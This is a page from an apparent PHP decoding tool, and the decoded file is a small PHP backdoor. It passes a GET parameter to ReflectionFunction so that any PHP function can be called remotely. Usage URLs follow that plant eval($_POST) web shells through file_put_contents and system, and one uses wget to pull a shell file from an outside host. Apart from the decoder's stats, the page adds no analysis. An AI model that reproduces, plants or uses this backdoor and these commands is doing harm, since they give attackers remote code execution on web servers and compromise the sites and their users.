Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $func = new ReflectionFunction($_GET[m]); echo $func->invokeArgs(array($_G..
Decoded Output download
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c],$_GET[id]));
?>
http://xxx.xxx/md.php?m=file_put_contents&c=test11.php&id=<?@eval($_POST[c]);?> // for linux
http://xx.xxx/md.php?m=file_put_contents&c=test11.php&id=<?php eval($_POST[c]);?> // for windows
mu201405.php?m=system&c=echo ^<?php eval^($_POST[c]^);?^> >test11.php // for windows
news.php?m=system&c=wget http://xxx.xxx/igenus/images/suffix/test11.php // for linux ?>
Did this file decode correctly?
Original Code
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c],$_GET[id]));
?>
http://xxx.xxx/md.php?m=file_put_contents&c=test11.php&id=<?@eval($_POST[c]);?> // for linux
http://xx.xxx/md.php?m=file_put_contents&c=test11.php&id=<?php eval($_POST[c]);?> // for windows
mu201405.php?m=system&c=echo ^<?php eval^($_POST[c]^);?^> >test11.php // for windows
news.php?m=system&c=wget http://xxx.xxx/igenus/images/suffix/test11.php // for linux
Function Calls
None |
Stats
MD5 | 263c2e5147281fed3c89c9bf53542505 |
Eval Count | 0 |
Decode Time | 200 ms |